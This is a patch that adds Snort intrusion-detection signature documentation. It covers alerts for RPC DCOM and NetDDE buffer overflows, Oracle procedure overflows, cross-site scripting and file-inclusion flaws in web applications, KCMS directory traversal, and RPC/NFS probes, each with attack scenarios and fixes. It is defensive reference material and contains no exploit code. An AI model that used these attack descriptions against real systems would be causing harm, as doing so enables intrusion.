+This event indicates that an attempt has been made to include a file from a remote machine via the "path" parameter in the "customize.php" script used by the "Ezupload Pro" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ezupload Pro
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1604.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1604
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3264.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3264
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/122-25.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-25
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a icmp
+sweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/3278.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3278
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1162.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1162
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/590.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+590
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) ypserv is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port ypserv is using.  Attackers can also learn what versions of the ypserv protocol are accepted by ypserv. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as ypserv run.  The ypserv RPC service looks up information in the local Network Information Service (NIS) maps.  The ypserv program provides the server function for Yellow Pages (YP) by providing clients information from NIS maps.  Multiple vulnerabilities are associated with the ypserv RPC program.
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ypserv runs.  This may be a precursor to accessing ypserv.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ypserv, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ypserv, not probes of the ypserv service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the ypserv service itself. An attacker may attempt to go directly to the ypserv port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/6016
+http://www.securityfocus.com/bid/5914
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1232
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1042
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1043
+
+Arachnids:
+http://www.whitehats.com/info/IDS12
+
+
+--
--- /dev/null
+++ b/doc/signatures/2760.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2760
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure define_column_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000448.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000448
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "OfficeFlow" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "sqlType" parameter in the "default.asp" script 
+used by the "OfficeFlow" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using OfficeFlow
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2218.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2218
+
+--
+Summary:
+This event is generated when an attempt is made to access service.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in Sun Microsystems' Cobalt RaQ server appliance.
+
+--
+Impact:
+System integrity, possible denial of service.
+
+--
+Detailed Information:
+The alert.cgi file on Sun Microsystems' Cobalt RaQ web server appliance does not properly parse HTML tags submitted in URLs. This can allow an attacker to use a specially crafted URL to execute JavaScript to place scripts or content on the web server. In addition, an overly long URL could be used to crash the server.
+
+--
+Affected Systems:
+Any Cobalt RaQ 2.0, 3.0, or 4.0 server appliance.
+
+--
+Attack Scenarios:
+An attacker crafts a URL with JavaScript and passes the content to service.cgi on a vulnerable RaQ server. The server then executes the JavaScript included in the URL, placing malicious content on the web server. An attacker could also send an overly long URL to service.cgi, which will crash the server.
+
+--
+Ease of Attack:
+Simple. Proof of concepts exist.
+
+--
+False Positives:
+If a legitimate remote user accesses alert.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Workarounds have been provided on the BugTraq mailing list. See http://marc.theaimsgroup.com/?l=bugtraq&m=101500887122597&w=2 for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4211
+
+--
--- /dev/null
+++ b/doc/signatures/2788.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2788
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure make_column_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000175.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000175
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow 
+vulnerability present in the Ethereal protocol analyzer's SLIMP3 decoder. 
+
+-- 
+
+Impact: 
+By sending a properly crafted UDP packet, attackers may execute arbitrary code 
+of 
+their choosing with the privileges of the user running the affected software.
+
+--
+Detailed Information:
+This rule detects attempts to overflow a vulnerable buffer in the Ethereal
+protocol analyzer's SLIMP3 decoder. It is specifically designed to search for
+the payload present in a publicly circulating exploit.
+
+--
+Affected Systems:
+Ethereal 0.10.12 and below
+
+--
+
+Attack Scenarios: 
+An  automated script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as an exploit is publicly available.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+Other payloads which will overflow this buffer may be missed.
+
+-- 
+
+Corrective Action: 
+Upgrade to Ethereal 0.10.13 or higher.
+
+--
+Contributors: 
+rmkml <rmkml@free.fr>
+
+-- 
+Additional References:
+http://www.frsirt.com/english/advisories/2005/2148
+
+--
--- /dev/null
+++ b/doc/signatures/1637.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1637
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2934.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2934
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/574.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+574
+
+--
+Summary:
+This event is generated when a request is made to Network File System (NFS) to list all exported file systems and which clients are permitted to mount each file system. 
+
+--
+Impact:
+Information disclosure.  This can allow an attacker to discover exported NFS file systems and client mount permissions.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a list of exported file systems and client mount permissions.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt to list the exported NFS file systems as a precursor to mounting them to read or change a specific file. 
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list exported NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS26
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000516.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000516
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "CMS Faethon" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "mainpath" parameter in the "footer.php" script 
+used by the "CMS Faethon" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using CMS Faethon
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2032.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2032
+
+--
+Summary:
+The rpc.ypasswd service is used to update user information remotely. 
+This service should not be available outside the local area network, 
+external source.
+
+--
+Impact:
+This may be an intelligence gathering activity on available rpc services
+on a machine connected to external resources. The possibility also 
+exists that an attacker may already have gained access to a NIS server 
+and thus all resources connected to that host.
+
+--
+Detailed Information:
+A vulnerability exists in some versions of the rpc.ypasswd service that
+can lead to a remote root compromise of a vulnerable host. This activity
+may be an intelligence gathering exercise to ascertain wether or not the
+host is vulnerable to this attack.
+
+This activity may also indicate a possible compromise of a NIS server 
+via a legitimate user account the attacker has previously garnered. 
+Compromise of a master NIS server may present the attacker with easy 
+access to all NIS resources the machine is connected to.
+
+--
+Affected Systems:
+All systems running the rpc.ypasswd service.
+
+--
+Attack Scenarios:
+The attacker can make a request to update user information via 
+rpc.ypasswd.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+SANS:
+http://www.sans.org/rr/unix/NIS.php
+http://www.sans.org/rr/unix/sec_solaris.php
+
+--
--- /dev/null
+++ b/doc/signatures/100000170.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000170
+
+-- 
+Summary: 
+This event is generated when an overly long Host: parameter is sent in an HTTP 
+request, which will cause a buffer overflow to occur in the GFI MailSecurity 
+for Exchange/SMTP web interface.
+
+--
+Impact:
+A denial of service will occur in the vulnerable application, and remote code 
+may be executed with the priviliges of the user running the application.
+
+--
+Detailed Information:
+GFI MailSecurity for Exchange/SMTP is an anti-virus program that integrates 
+with Microsoft Exchange servers. Its web interface is vulnerable to a buffer 
+overflow attack, which may be triggered by sending a Host: parameter of 100 or 
+more bytes in an HTTP request. Vulnerable versions of the application will 
+crash, and code may be executed with the priviliges of the user running the 
+program.
+
+--
+Affected Systems:
+GFI MailSecurity for Exchange/SMTP 8.1
+
+--
+Attack Scenarios:
+Attackers will likley exploit this with a script.
+
+--
+Ease of Attack:
+Simple, as no authentication is required, and HTTP is a well-documented 
+protocol, which allows for easy creation of malicious packets.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Download and apply the patch referenced below.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+ftp://ftp.gfi.com/patches/MSEC8_PATCH_20050919_01.zip
+
+--
--- /dev/null
+++ b/doc/signatures/2006.txt
@@ -0,0 +1,90 @@
+Rule:
+
+--
+Sid:
+2006
+
+--
+Summary:
+KCMS (Kodak Color Management System) is an RPC (Remote Procedure Call)
+service for Sun Solaris operating systems. It is able to read profiles
+stored on remote machines. It is possible for an attacker to bypass
+directory traversal checks and read any file on the remote system.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources on the machine not limited to user accounts
+and business data.
+
+--
+Detailed Information:
+The attacker first needs to create a directory under
+/etc/openwin/devdata/profiles or /usr/openwin/etc/devdata/profiles,
+using the ToolTalk database server is one method of creating a
+directory. Once this has been achieved, the attacker is then able to
+perform the directory traversal.
+
+The directory traversal allows the attacker to read any file on the
+compromised system. Once a sensitive system file such as the system
+password database has been retrieved, the attacker may use other tools
+at his leisure to discover username and password information. This may
+lead to further system compromise.
+
+The KCMS daemon runs with root privileges and is typically started on
+boot via inetd. The ToolTalk database server is also commonly installed
+and started in this manner. The KCMS daemon usually listens on TCP port
+32871 although this can vary.
+
+--
+Affected Systems:
+	Sun Microsystems Solaris 2.5.1 (Sparc/Intel)
+	Sun Microsystems Solaris 2.6 (Sparc/Intel)
+	Sun Microsystems Solaris 7 (Sparc/Intel)
+	Sun Microsystems Solaris 8 (Sparc/Intel)
+	Sun Microsystems Solaris 9 (Sparc/Intel)
+
+--
+Attack Scenarios:
+The ToolTalk database server procedure TT_ISBUILD can be used to create
+a directory named TT_DB anywhere on a remote system. Creation of this
+directory then allows the attacker to use directory traversal to further
+compromise the machine.
+
+--
+Ease of Attack:
+Once the directory has been created, further compromise is simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the KCMS daemon in the file /etc/inetd.conf. Kill any running
+KCMS processes and restart the inet daemon.
+
+Configure your firewall to restrict external access to the TCP and UDP
+port 111 used by the RPC port mapper service and the range used by RPC
+services, typically 32700 to 34000.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/850785
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0027
+
+--
--- /dev/null
+++ b/doc/signatures/2373.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2373
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with Mollensoft Hyperion FTP/Encladus Server Suite XMKD 
+command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+CesarFTPD offers FTP servers for Windows hosts. A vulnerability exists 
+with the XMKD command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the XMKD 
+command.
+
+--
+Affected Systems:
+	Mollensoft Software Enceladus Server Suite 3.9.11
+	Mollensoft Software Hyperion FTP Server 3.5.2
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the XMKD 
+command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2354.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2354
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application IdeaBox.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+IdeaBox contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable gorumDir when 
+making a GET or POST  request  to a vulnerable system.
+
